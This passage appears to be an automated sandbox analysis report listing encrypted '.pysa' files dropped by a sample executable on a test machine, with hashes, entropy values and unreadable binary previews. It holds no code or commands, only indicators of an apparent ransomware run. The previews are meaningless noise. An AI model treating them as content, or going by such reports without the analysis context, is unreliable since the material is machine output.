                  SHA-256:E1BDAD36E9B10A9FDAFB69EB3E6345EE7EC4C3D2C2196B958EFCF3E0DE0F277F
                  SHA-512:DFE7D6402FA68BF5E688862FE4B12EBEA6008633D5B929EDA29D910D5EC8D788A2FA144CC08EBADC047AEF1A61936730795DFF0C2DFF8A60FEAC970F3E2EFF74
                  Malicious:false
                  Preview: ...WHL>...4..,d[[...y*.Hy.!W.....d..T...m....2 ..u..V..%.CrK...mU.......8.......s...]?b|.J.Xy..I.W_.G...=.....c0$...*.-...0B.6...k....@J...U..I..w...7.?.V.,......(...].)M7;...[V.V..".a._.`....5.GG.^.]R.`..;....6.]ZZ....n....C.oj.6y2.sY...fc. n..XQmT..U=..w6@.....%<...h.k.#..N.-}].T..q.rd.YjR.=..Y!..!$.T$/t.r..4...f...d..R>.b./.l..........,........~......Ne..m.Ed..J..|7...Ug...........lD,b...'...Ko^8%^..._.n.~..p.....U...)p.a..Y...:o...,....3?..[.?.....V.{.74X.(..K.Eri...JC....y@.X..<...r-..p.p../.1......m.G...i...._*..,M/.&{X,...#.....cop....J.|.......$.[.d.h.....].-f.u.h8b...}Ke.j.<.h:...*......).3.\x6..OXZ6./t^N....s....0...D.ce4...#.6&.>..H...|14.n.U.....<1..X8YF.....j..8.x.......,..o.$....u._4....L.......M..H....1....sJ.I2g.-..C.q....F@...........c..;.v....d\..P..Zl...<.T.................[ .m0~.F.i7.%XK..-+a..k.!..(MA..w..=....FV.hk....as.V..4q.F.H8....G.....G..f"OP...K...'...=..R.......T.'.....-0..6.3G,t....w3Y]E......xS.
                  C:\Users\user\Desktop\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.040970753638709
                  Encrypted:false
                  SSDEEP:48:Fnl3pPohbbFOrkksDBgYsARjBiSMUG5Eg/PpsttbYnIibhfg79QviXmQIMjZFlZN:/pGbgsehopjdMs8nI8c9QqXP5ZgeLWup
                  MD5:05B61C724C528484DF22A7388CCD7572
                  SHA1:B7144FD888C8803C9309CA391781AFB59F778796
                  SHA-256:462838788A27FBE6FF110C33E221268D79FDB6C107D392DD773EC2E6AE67521E
                  SHA-512:C67278D85ABD49988940EFC722E3A0F089274871EDE8E66EB441C04AD6466E191B35917DCECB24DEA5D822D571DBCC70157CC84722D601B7D37E388D37294E6D
                  Malicious:false
                  Preview: ..j.P..x[1fm9....0.Az..X.......T4V.....\N}u.@.?cKe.......iZ/...]..:'.O@..k...ba."t.C....*.....z...,rV(....U.V.F.c..z.8_.B....h.S.....K0.>N..mYr..3..M n\.....H..l..U|.......)5..5.~..[....D..).=T9!8;..^..j....3?.-.Q. 5...MG.T.8...s}$>L....0.l.t^.g..!...2.R....6Sw...}..f..G.3....`&.f_.z...3.....p..K....K.d.........8.X..g9.p..Mo.Z..*....k.n..../h..{.?*b../p......B.....T..._.'...Z0.D...k.lu/...ea.._......y.0...r...Rv].||....V....4.j.e....Y..>a.........Ac..._.1...4...xa..*L.....P.+/.......:W..A..,..z.e5.T.u.N...n.83...oG%w.c.6...N.";./hj....O.]....?0x.f.+hGX\e.......cc.6....;.X...BR.r.VRH...N6.m......./wu..|.!7....]....e.%...d&...]22..T....|..6(.....1..-W...G...!2.tu.0.i.=..awS|...Y.@.......B.`.Wo.l.=....i>..~......(..(....V...kQ13G..\.G..u......b..(...0...p..7j.4..5a.C..q..M.Kfh+...l... .......9...G...?1.LzK.....-%..sz8...Y....W~.....T.==..}..2x.....:.....0v2I....k{..MO..c.%.g.DU.....v".}{.E@...0..\c.+.A........=Nl_u..P..6...5.T..[....k....
                  C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0227179011790755
                  Encrypted:false
                  SSDEEP:48:YoYbme/vld0MemGYtWmf+awhNab7NBSMnbwpAop8IJFXWXT3awTaWYoUOJMb33Tg:YoYbmUvld0TmTt5fpKNIOG8K1EXa33fF
                  MD5:9E78890D78F1A0B4FC210DE982E67804
                  SHA1:2BA77869545913A64E463D7247837000C3C29B3B
                  SHA-256:B53DB6D51EDA11E547D901237FD03AA87F212EF6D582FDC7D15AADCBAB74F2E1
                  SHA-512:26FF9B0AF2BAD41D5E912B04061DD61A347779E413B92802B376E65C59289895EB817430F0BD97BFCFE009AC1CDB31CF962E7D0EC0D053034A1D4CAFBAE41B77
                  Malicious:false
                  Preview: .X..}S/.TwW..iI......g...31.V..G.t...... .]..F..:...q.I.#^.6k.G0SNL....1/.!...J.......W..@..|[..s.\....3^.........D...]..:q..[..G.N..G..]0..d...G.....k$9Tx..R....2......_U.1....R..e..V..?.i........<..u..X..71.-VRJ.^...t.sSN.g.....1..b.....:+!F.A.(...l7.1.c..?..x/.#. ...G..2r.H..b.....Ot.6]=e..h.-.&_F...b..0?....i`...c..^....>5x.pn..t.^x....a.XH........%.$.E...._2.i.U`..#'@..).g..l.w.......1....\...+...|8.9B..#..C-#?...=.......j....(U..u..n'Pz.=.....#..\...Qt.#C..'..~....YE....1AUFe.7'E.e......[}..w..O.j~.i..-..W0r...U.. ...Kpt!-5g>Un...cE..).$A..8.4.C.p.F.05..P..H...>0h..*.#p..p../...h.g..{ ..hZ..[T.H:G.D.E.......S..d../.....3,......{,4.7.g..........5`...wv...U.e.q.-..R...N...N.....5..d...S..*..].K.d.!,4O0.+.r.D.ArN......i$...Xq.K....R._...n.w.1..5yK.>.=.F.?s.&..*9.mHY.Bd....../...&.:..T)...`.r....C2<..........9..r......U.a...K^.s..X_S..9...G..?......XK..]..|..H.OF>U+...|.=.x.>..X...U..&".H.2JC=..'5Z... ......@.0..e..s.....9....
                  C:\Users\user\Desktop\QCFWYSKMHA\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.067141094095181
                  Encrypted:false
                  SSDEEP:48:p3A0ludjduxG87KTd2RQ+jbF2Qxe7+e2EuZKVRNTXvYLfXHcTvPojrQtZfsQ4umI:p3Aiuvh87GdCQg2d+InNLkf3cjojrMsA
                  MD5:22BC151D73B0A021831D04B3A37EFE07
                  SHA1:A8591A9A43DE7AE77411662DACE753B19906A9FD
                  SHA-256:CC85FE881443003FF802AB8AAC56AA1726963AB475E45C9A02FC4A6C934ECB96
                  SHA-512:FB9902E1B1FF9469155F0CB7A26A13E6AF82D6851EF571ED38935727A61923D00DA8841927EBD064BEB69F91CC500D35154FBD61ACADC546395C0A9CBBB3FCF4
                  Malicious:false
                  Preview: v..w.._6".*^.........BJe...{........g7.... ...kQ.@..vO"4>..#Y. Px..L..$...(X.e.......Z$.......n..{l~...y.w3x....%]...~.........#.e.'+X.g..gx...!..OF.i#..{.)\.D.VX.j9.]>.9<..../.?.Y..FI.%..s.T..LY'..O#.o.....j..K...l..........lW.+...>a.[.P]...,... .&.....X..d..l..>T.6^1^.z..y_E..Z..Y.N.tYD.x 1...Q........|.."DBE..?..B.o.t...b.\.....H.[v....fF..e_.Y.Y.F.g&.X..Q.x-.L_.2.y.$oh.)U..B^e<hb7a.....2.z....F.A..H.3xv....o..2...7..._.O..}....7...E{Z>..w......*.....a."y.~.....)...-j..D..}....O.*....".F..T.......|...@.%..u.=..f..0).=`zN..hNF..@hJ3.A&4.$go#3..k. ..sI.T?.."<.v...F.b9^....0..-.y5...0.......)SD.GV...)N.[rd&...!..........$._,w[..H.2.T...I........BV.Q..._.C|+z.....O..*I...V-Rs.-...I...J.0.&........!.Z.+.G(......kf..nL.H..i.b..z..]v....u...f$.{...x._.R2.Y...We....s..=......~Q8..t...j....N.....JLf...k...~vm...\......yu..:.Ua...l..._{.Z../.L.d...K...........&)x.[`....v.%."3.:..y...P.e.......M.lX........f.qT?.,.>z..!G.7nO..H..>......d<;.{
                  C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.070717450453156
                  Encrypted:false
                  SSDEEP:48:qy+xrvr9NAmhgo6RZX1bVO3A+ZTmUVGm8v8hc6NIWtnq/k6TDQQ1pRQBcGdTpBDx:GZLALokF2TmFjv8W/WtnUb3RdaBF
                  MD5:E5C0C47994FAA534F07ACF10B9A1E3C9
                  SHA1:716841BD59CC44CF856194AC3BD31B4E11EC771B
                  SHA-256:E536CFE3E1A25A57BD1E401F6337B78CEBF096E5F107F46DD27BA20DE67D25A0
                  SHA-512:0FE25F1C3CA2C26410B26FC6D9E30B7C7ADABC695FCDD8F394878C8F90CB103B27BD17850B1C076684B1D23C69465A0A502ACD6FDA793CEBB97B6FE7B9AF5E8E
                  Malicious:false
                  Preview: .D..Dur0..j.s.!.eN.Q{/........n....I....,f..t...#..=B.y...]})J._..W....8-.S(..k..$J.......).L.mH..D`1./.%..r.qm.Ai.h..J..xBU|&...Ia...P0.^..Z..I......wO..5.).......5.t.. ..dc..d.......u.9.'.......j..m...3..dt.......k0.;..5.Q....M.....3.L~.../...ew.q&;.D.c._.6...B.z.......4x...^...K.A.{;...R.?.}I....^...H...W.08...<+.....\.....8..S|.....7..jN.ik..n"Qg....G.l...A..~....2..a.$'...?.U~.E,.. 1.z.{..;.....g<S..Z..:.m..Ub..d....Z..l.e.....R...)!.Nn...y.`.\....<~.6..+..[....o...+j.7K...%.~...cv...c...L....pj........@..2.^.J.,..<..&........}U..a.]...`.....-b..n...e..~{H.:..G.t..Wk.........E.a.-1q.D..,.|..G^8O[..=....E.......L.t....a(..)..7..g..Q{>+...,T.DA....~l'...s..\e.A...C>......@.....#.MZ...K..YJo..%.YK|.tT....1.....x...._[.i..=..Mn.m....vX..........;.LA.F..-"..L.^E).~.z.q.$...v."!...L..t.L...$w....~.....|..y...... .'i_....x..H_.....P..O<../.".w.\..H.z>.^U..&6_.cq.q...4...{+...V.-.nw......W....'..:..?}.EJu$;.Y..;.;..y...A.#.w..[.@&...t...........9.
                  C:\Users\user\Desktop\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.048594942259095
                  Encrypted:false
                  SSDEEP:48:6WobXFbvwhW8QWPf6vneAwikV80rgenhySBdHUbm2FI+WfggqGfVr/9nni:d6vwhnaeAFw4Qd+I+2ggqGfbi
                  MD5:BF0B2641994630403ECF1A3AF98D3E23
                  SHA1:F54E10C94F7F7868E129F249D9A47429B95D5F82
                  SHA-256:C69E250A3EA9A936261D70BB77F8E0E3B29AC1DD962391B4F28C505A33FB1551
                  SHA-512:F22253DCB0734C9A55197E8F8C5393B8A45ABB485601CC9D75907E730C2EE6E651A263D55C7471C345E8C870E95F27242C1207133D77B4A2BC9C82F79A3AE30E
                  Malicious:false
                  Preview: .<.@=....?...j.O...=......I..z.<.+<"..H....:J?..PLv.........b%..nT..I....5...r.<.....v.K.'t.x.T....d.t.=..3:...s.....F-h..H..7...Iq...BO.. .g'X9...aE.O.8..9.j2.....)^z~B.<..t..P...u....*..hQ..._j..(..^..%...........u.8."?}LV.t...].......j'm.xF.......... .h...=|$....#..s.Q...=....X...ym..(...... .<f(x...9.|3.....h.....Y3zg.wo.....\.D0....8.*WKo.q.oy.R....X........Od............ @....@P.z....m.N8[......u.f.s......GK.L.J.....`.*.y.G.P...F.Q.........D).\=..}.s.e..0..77d.n\.G.....P.....q,...k...Z/..C..E..9~.H.......r.0.%7x-wk;.......u.os..)@8..QC|RQ..?..$..4D9.....dA,..D.G..c.....X........1.......C.Nda5..z.}.="...m....o.=./...;..A.^.3.Z.l..A{i.J..f....C...u*...(..B...<.z...7z.<.g..CF...D...{NXD....s.Jahm.y.4m..N.9.....&!.....3Ys....I..I.;....*En.^...Rc.m..s.....o..U.... _l..b...F.....!_.X...:5.Kq....K...W..{q...F:...(.^....#tz.Y......l-..:FL..e.7..;.%6i...0.R..$.Lk...vk..(........1KL......,".n...z.*285.}..Riu.0....j-g....d.+.n>.....Y.}..
                  C:\Users\user\Desktop\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0636312657404785
                  Encrypted:false
                  SSDEEP:48:P6DSZ9MQUeClPZCU2OUZF7WdWQD6t9agldn+HyWfwTg6x3c6bxn/m1AuAa4PxjR2:SSR6PA4UZF7Wd/Ds4SQwEi3c61uAa+b2
                  MD5:9333686C758751382A9AA0CE0758C9AC
                  SHA1:F6449B6903C1C88D80B5A92073E57527E48B7C5C
                  SHA-256:F2FC47536BAE4452972C53A10CCC728CC34613AA345DC9ED34D12C9027C71B33
                  SHA-512:A93F39A0377F262C4241F8E8B06651087286A52E3ACA65A7813061D699054897CE52B43A5A646B6E1E7A49E6F758079573A078DC581CDAC6968FFA796BA6ECCE
                  Malicious:false
                  Preview: }..$......Q.vg..%........c..zt.....t...0.:'G....iec..g..G..<y.....R..!..n.=Lfj.;.e,....1Bx.....H...._$..C....x.......}y.).T......o..M..J>>5....8V..2^...E..m.^..gg.J..?{n.k..Typ1..:....,..]<.. "?|."........S.p..l....(e.as.p.r.}..sOk[.....W....(<...&....[Pr.f....,"e......?....5.sL.Z..-....[6.q._5.gK1....}y.H...vl..$....].F..r.d&.&q.....]r..y.q.P.O.E..F....j..e...{.....)f.f6L...<..Ng=.._....B.9.%x.....%.!p,-{0.R...x#.RL.bF_p....\Va gq....Wb....(..&..gC...^...U\Z.\@.7..a..M....5c...O.k.,.t!.....f..1k.82.....sp...C..x....Xg.1^(.....E.S.Mm.O..1.o....v.j....x..Y..!...Nj....(r....8......0....;..n%........+...,M.*../.....X.bh.6).6..m.%x../.......m.......H...E....C.@hd..(......~...2.@Tu..l.bW..#.[#...)..6.jNz....|. .=.....i.......Ty..i.x.....g{t6..e4[,..@..:.8^<4'..\. ...1;.P+85#..../s.........b5.OlJm..l.......9......F..]e7.\..^...&>..a.{Yu....`...}...N?Y...6Z.0.......-..?^.....mr.."O......8...^b0..........Y.eQ.*#.....T...Lw.....fz......g.<M..J.......e..3$
                  C:\Users\user\Desktop\QNCYCDFIJJ\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.048599735133278
                  Encrypted:false
                  SSDEEP:48:8Yh3VHj31TegvDycyhX8AbEQgieHurS5nJyzzn2yiP5d1slG/dYy7YSmeXp/IA/9:8YjD1TegvDjy182mOeXS2yixd1rY4bXl
                  MD5:9503459C21F81281CFBAFB4E9871B676
                  SHA1:8B948E72DA17BC723E8A7E680F344D48E4814823
                  SHA-256:C674BCC16754E3AC5551326B6EFB8F2CF393DFEE047A554A935E03072995FE1D
                  SHA-512:F8C028D2EA8959BDB32E5A69B2B1D6B1B134EA036022361CB7F44F606C5B987CEA821038AB4A1CC50FFFA16F2C6683A2F20430C11EB654F4ADF22BF19AC1C802
                  Malicious:false
                  Preview: `....5.B.|..._.1?.'.~.l..J...........A.4....<..78...z..:Z.*...N......3`.#.a.......|..e.h.)j.EZU.5l).*Y.5.{. ._.....}..O..+......"..o..e.........y.XJm~(e..:...F.....i...]...2....1x4..c..2.....#..E.>..'`/.w)......T....6.=f..c..&.m..e..7...<..U..L.L.....AG.|)....#.....!...F.L.B.y....L....5Z".!ckG.'NS.....y .:.."...dS..hKRt_.....^R...[..@.MH......v'...W...?....N...z.90....`0.3.1.`G.....=3...5.....=../.D...b...#.&=...........A...u..S}.*.~s...rPk..z..^...[s7.O.,......Yp-h...V@.4Ig.....?..l..[.ynS0.'.%...T] vD.....]..<..S..x.X.;q.!.).Qg.S.x.v.4......8A..>(..G..H|!F9..;.....x..#..j..a..*........`i..m..B61....M.,.1..XD.sq...s}...LKt...d....[b..C..+~ptt_YA&...&....Z{.>j..K.j.-.<....x...t."..1>...V..|.*}.B.:JA#.Z.r*O....x...)..US..0..T`.gU..>N.A.....o..i..k....S,..d>....5.'.......#v...8...q...E...:5.$6...j...R..T.....R....G%..t_U..|O..&O..Hv_J.\h..........._..c.U`...a.z.WX..eD.S.......;..0...7.q......V..[..8=4..lnal.-.[.5..k...)G.mw.uR...#.c..-w.g.r.p
                  C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.058538268969088
                  Encrypted:false
                  SSDEEP:48:KRePvH+4qUJ6JK1QOVMJnGdqF+7lhsf/yCArEOEO+3DlxJWwNQ:seH+rUJWRMMdNFulhYqCdt3pxIwy
                  MD5:10B8B4FC70DBB028D68D5CBD730C32F2
                  SHA1:DB97EAAFDA22CAE97B24451128AC151EB393F5CE
                  SHA-256:A5B19C4E22F8FF5418B42EEC4A66234DEA243622F13909E429385CE662DDA4B9
                  SHA-512:EF6287DA915739A9548F64436696D25DEB5F2FF8B98A8679C8D531394C3F6741476FFAEDF0856AA5634BC2532BE463DD6F471DB9CACE2364EE7717256C486D05
                  Malicious:false
                  Preview: .u.W..iT7Q<c......W.....U..Z...%a......b.....S...H.z........&.#.z8...Vl.....X.C..P....%.va6.\.&...<3..&.D.<,^G...zF.{9Qp.cp..I....#..@.yp..5...[_8?...~...2.[..".6..j....../.j.3....X%k(.m.....zV.^m..:+pit..^.. ..3..^.gZ...x..P.2PQ.*k.-......Q.2.....c.]|.53.4c......0@......8.?..\.:;:F:..h?..\.....q.uL&[..lO.....~_g..>S..3..D.....6).9>l!.b........v..R...,'_. .........i?.3?.j...t..;....q@G.......V8....$#I...~.A......2.~.......y.....<1=....^.Ux*.....Ih`....XG..J6.6.....8....r....Jm.R..\.f.9..!..n"T...E.>S..j.3.u#..'...u...Qg..`h.T5}..8....=.q.A..,.V..<....6.........!...s........;U... ..........'.#...^.]....}.k.c...8....o(.{^..w.7.].h.(....E...ve..._.!..o.E.&l .`[.....6$......({....U.,A..n... ..}.....;.$.l).....z;D..[..'..O(...ky..9k.{..?.9s.4+.....;C...2....._...........Tv?..........(.t.'+.o....i:.G.JG.B....A<#.....,mD..M*.......y.....K..f9li\M.....jU.=.G......D...b..h..:...I2..\...y.........Eb}=.?f.[...b(.$>.....hX...^a..$fa..D.. k.{H..iL
                  C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.044446896178692
                  Encrypted:false
                  SSDEEP:48:Doc+M2v7posur2uxeKaULmyin8RJhSOSsqcIOR0UOmnWvu5qlxrooqpIwnj7:yMg1oeuxeKJin8HIX25n0xrhqpIwn3
                  MD5:A951FCF1FBF4A476D3226EA868835EEA
                  SHA1:DE59B2F97A20C2889F1B1D01EAB8E6094C7BF5BD
                  SHA-256:7073E7AB28E3CD35DD651AB72AE4B601EC524506CC59718FE1092CDD68FA3EC9
                  SHA-512:5F1F6D02107CCBF76093EEAE0455592F8BC08C4B496287F815D838412E0D4BB850128EF56F213F566CBB609468F7E196DD239DE4331AC62ADC2644EF65B4C767
                  Malicious:false
                  Preview: ...?M.l..J...+..KI..!.AMw.*BQz........K{......m.oa.R1~%s.L.s(Q~.{|...@...3_G9.E.....19.&.[2)..+6m..-.h.La..\E>...g6eM..kPf$.u..F.....kt7.u...}?...sg....KzI..!.r....n*.....Lr_#./._...Pu.....l........3.....3~<....@A...@.......Fs....GN.ArC.g..7...>.f.=.I(.q...-G..E...jo../..=.srd.Q...............&~y~H..%....3 ..;B..z.+ut..CFWd.h!{..M... .w..P.+.8..``..%wd.{.O...I...j.h...m.n...~..4...fB>.....'.&...\i..'.%.=....+..5T...l.#A..C..^.L...._.&.....6.-s.A.]..8...D.(c+.b.k...:...K...........V.".....7...R)Y..v.............1.c.PJ.V.Y..T..A'......k.'.2..X...Rb....v...`.Au...1e...q..N.c.]5...0.D|....70Ir#...eF..gk...............Q...0.....E6..F=....e...zhq.eC.'....F....e.?..S..T(}....v...D....4..d..V.......J.......p|.\...m........|.{...Th...........+2[&...b1d;.f%.t.........S7w.,T.F....-...../..n..~.^A.=.....3...7.l.3.({. ..B.~%+...#e...{%.....^....4...{egY...E...AK.oTU....S.W.OI.~....`;Y......m.k...fZ*T.....@g.[..@,U....4.w....tG.4..Uj..[..
                  C:\Users\user\Desktop\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.048056526992952
                  Encrypted:false
                  SSDEEP:48:84KhsA7Kdk+mk249p6KoMgrx3acJZjo8Ir73ht3CJBcBAl3A5/GgvlGlMdlbN1:LG/ymk2zKoMgd3acDo8gQBzAMgqMdlbH
                  MD5:1AAB642721FBDF0A16097B4AD3E39B0D
                  SHA1:C6EBEF09300A62A4B4A576419F420AE58397713F
                  SHA-256:DDD8B59D24CB1119FFF31D57DD3084AA92F8CD797F4BA7DE826B530B3BCF55D6
                  SHA-512:F6F621AF555D66DE6E81955B953E273BA1FBA4AE34F0DB9DF58DE6074DAEEB7544A64489FA542E1D6D016B6FA239099ED4EF7ACF3FBE3383799150EBB78F8B5D
                  Malicious:false
                  Preview: *L1.n....!....y.+y.n..dH.......M..xI..g.o...X.P.l..lh...2`..).A.|....p..'.j..z.w.C..hA....$..]I....X...Z.~q&.A.|.X.+(~..+........E.J..1.r...-b..!..V2...1.......V,6.Xv.,...c.'......a...AGd..7.u..%.;..K..P..P.........r....e......$./i....S....\.F...........D./.'\....&T..V....2..m......q.zFs.Y...Jy..........t9...o..C..t8l..........y..4...I.H...F....l.y.fL_x...0.f......|M.d.s........O..P.......(..._~:>.$b..?..n.[...Fa....@=.TE:.;N..f...; ...a.~.1....ZU..]q..q.,.Z.......cUvt-.P.e...V.;.|.sC.kD....Kj19H.AZ{......TkC<~..:-.e.......K-.JS...1..$..E.w.1....4..y......F.d.j...p&sz...`f...s.,.2.0Q...9..f...vip$......P..D..Y....u."...[...B...[...|.E%.......Q|...*..,vo.-..Kz..U.2n?...]{.......(.....).......>../.|.S...(...I@G ./..6.....Z..|.N...u../..Z\..h.Ly.A.n..#.6.oq..0A'.w...j.z.<$.Tg&....^...'S..1..u"^x....{.y$.?3X.J...\...w..0..(..(..BR.I.o... ...v.A@......1.Y."...F..n...)..6AX......z ..-.C..9Li...p..."....y.5X.rm.bw.Sqk`.`..(...b.HA5RZ..}]
                  C:\Users\user\Desktop\ZQIXMVQGAH\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054449174497737
                  Encrypted:false
                  SSDEEP:48:VHy4XU1uUfUCtxIs/o6WULMhHsU2cZT5+vgQGN76oKDmYUMGPwxRQVB5V:dJXjSUuCsJLgHsUKvgnMmYURwxRQVDV
                  MD5:64C5C4FD3638299DD8283F39CDFC82B7
                  SHA1:4E34CC5F1CCAA57FCAA3E57C0DEAB61B65E2D2A9
                  SHA-256:7CCD1261C6E7F618CAB9D755553851ACF7D9AAD0104292E48956A7228BE7D056
                  SHA-512:C2364EC54D0C767A94FD0F8B97CE6E83A5FC433A0ACF4AFE80861B00802A83213FBF2143DE0366EE31502D4A0603ED27CE604538BD99FFD734B089AB88E92240
                  Malicious:false
                  Preview: ....{b..0.....Q.}E..'...7..J....0...z...^<@.x......%......&..&.G|AN.!.sp..:.F.....;t.a..w...d$......A..k.P5....XJ.......c.%.;CI.Dz...F....;...J...H...p!Y...V.zD..n..'z../.3.3...g......W.h(.*.9...5...I...N#.D/......>.".W....z(..........R....d..n..5.WQ....x...=...,. 6|:......@G1h.W.4rS..H.n...h@.?..M....Jp30.N..j.......w..l......l.V..RN.h.w.... ...H5a$..c......#.......0.{.E.ba.@it`$...Z..u..\<vx....m.iV.j.O.{..[#.Y...}g9..a.H..[..3..q...E;e.7..O.!..7.{T.c....)MO.Pr...c.]/.8...g.F...\...y......u..h./.)....TN.....2......_b....R.v>.....F{..K2T[....Gl.......D......p.O.|.S..@$.P.....vt...q.t.4.GC...*J`...!.8......8o..Fr.'|.}b.C.....Ei..o..xy....Y..Q.M>...;...a...Eol.....;...i.Zv..vK...gu..T.....1..w.Cz..2"..G.we.u...+M...........x.o..VT....v.6.e..C.'!^M.I!O......&...G2\.}....C.ke.@.=e]..rJ.x.......o...V.\.{|.4.[.o.}...i..S.H...`.V&.0......={y.}..q...7{...D.}.<!...W.....t.6k.-O%...j....>.j..x..z.S.....R#.<`..H......(.bz.+.r$O.c2.P...[.tx7g.3.........`.p
                  C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.057021324845787
                  Encrypted:false
                  SSDEEP:48:gkQwpYZAUYPK54H6Y7JMwGY7V026A1LZpHh81R44wYrn49eVYaq0XNQHfyJIm7TI:gxwp6bCK54HCwGMV0lAlhaR44l0e7XmZ
                  MD5:C7065AFFDBEB38EABDD2C702620A43E3
                  SHA1:6FFDACB8CC6A5DB81AC784C96FCDAE75A5B70C93
                  SHA-256:6BFA555BFF2EB97BAE38C4517D1185B9CB57E641BAA627CB089F8BC1E2F90278
                  SHA-512:3C26BF534BD9E9AD506B157DFBCCEFACFD4476D23E2554D1389AC38A61EB4EE33C14C07D6AA1416DB643D9B467D9145A9B2B72442E2B796298E9E3E4A9103758
                  Malicious:false
                  Preview: ...@....%..q.H....>.S.GM.*.....]......."#.\M+..'B..YI5l0......{(....#...Y...9..p..........y.+'....D4Ki816)>...z..H..fk.Dg#...;vM.hm.z!.....pm9M...f.Y>A...+.T.@..Q;.+.+Z|..!Q..lX..m..c?..\.."m.......].r..,9.-Yef..x...Y.}gM..3..81.6.N.P...X....r.mpQC..^V..9..&...,.NH..Zt..K.l.?.M.....8v.v..9.h..^...Bi.[@gC.._....O.n....9.re*.sCk{.R.6..2.cP#.7....3..B.X4..L.P0..F...B`...!...(\@n..{..S~.k1...j.t...rF.e............h.S._...%..[....5.......X@l....WQ.C..>..a..<y./....q......Z..yR.....e:..M._.#sp..S#b..d..j_-..y.`......Y:Xl........:8.9_#.xs.tG..x..M...........V.:TX%.).!._p.r......|.f...$v.x..*6..t.06Gz.4D..8..>.....|.d.U*A..Y..(a...E..Ko Y.Q.+.p.Q9........"..X...[...Zd....Xa..(.{tLS.\..L.}f......'W[JSAo..b..f=...pj.:..Nj.....%.A,...1I....x..{.;2..x...a.0..l...(j6N...,....h.H....}.....^......!^...w.{(HA...;,-_S."b.;g|.=r..{].#..k.i...vvm3,.d..L.... #?.....^...c2O.t.Y.R#.2.z.."..."@..xIQ......;..g.^...[n.l.0.X.....7.......@.......s4Ql1.
                  C:\Users\user\Desktop\ZQIXMVQGAH\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.02782753661113
                  Encrypted:false
                  SSDEEP:48:5QrN67l07+NewmAhRDDapSEyVEvnv0W07SUm/pdBz38ca5v+1M9cG3dDh+0zpcZ8:52U7u7Me7GEpYanv0WsMLBz3oA1MGSdj
                  MD5:12132B9FCCB5960251DFDA310E66B362
                  SHA1:3E93D3CF076B8328B5ACB88520E152BDAB7C4FF2
                  SHA-256:DEF1BCC65EDA37EC9BFAB53ADE7E04247DE6D622C1561C84DAD1A946CE6EA3F2
                  SHA-512:AEE7678DEF4C8B5C4D4577CD1FA2EF9EC0E9B7665541A17F148CAC6FBCCD038E448352B94E2E44D4E116A1F89068FBB2E7A680F1F4630983F6BFBEE29A4C3D47
                  Malicious:false
                  Preview: .BU.]]..mG..2..2}...?g..q....3C$kE...a..Y......q..h.".B&.a..o=....).._.'..~xD.:W?.()D. ..e.2.]Q......>.g.... .......^!....b...4N(B.6...U/./..i`..!.>.@1...>...-.`.......&F.b.N...h.......`8G.m..m...;..>...h.q0...D..^1,|.%..T8}V.._Q:.8-.offD..s$...\fK..u...9+w....a.c5C..-7yK..\..6..j..vviq.........@.^y.*.4.LKw.Gz$@6....g....-.aa.!.1X....z...MT&,.V}w...l.Ng..[.4u..{4ZL.........3...m...K.....U(.......J$.R.&...QA..k..n......*.2D..Dd.....,..bvv..d./;`!#....;`..2 ...ar#.f..[M....%..yCc.xe........+...<g...`............6k.y!...d.\&Um.._m|.....y.3......D....*0L[...B....Z.-..k......1..q.}.....T.!c....a..1.m7.....c...`.G..C.U.......?z...6._...B..2...R.F.e..).....,:d.......+....D....N.I.(.aj.....XA...?=.Wi...[..yH....:=....*y.s1..~C..Y.=dNf..>.-IU.....i.0..]>.+.bxT.FoFq....]...j....f...u....3.T....@B...1.X<.ddr...mV.(.. .T..0..h"....m........a ...s..m....-..@.\.A...]..\.9....(D.h....1,.+B.C...`....t....A.x.Q.1\.0..!7...g....'.......&%uw.%LBz.c}.
                  C:\Users\user\Documents\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
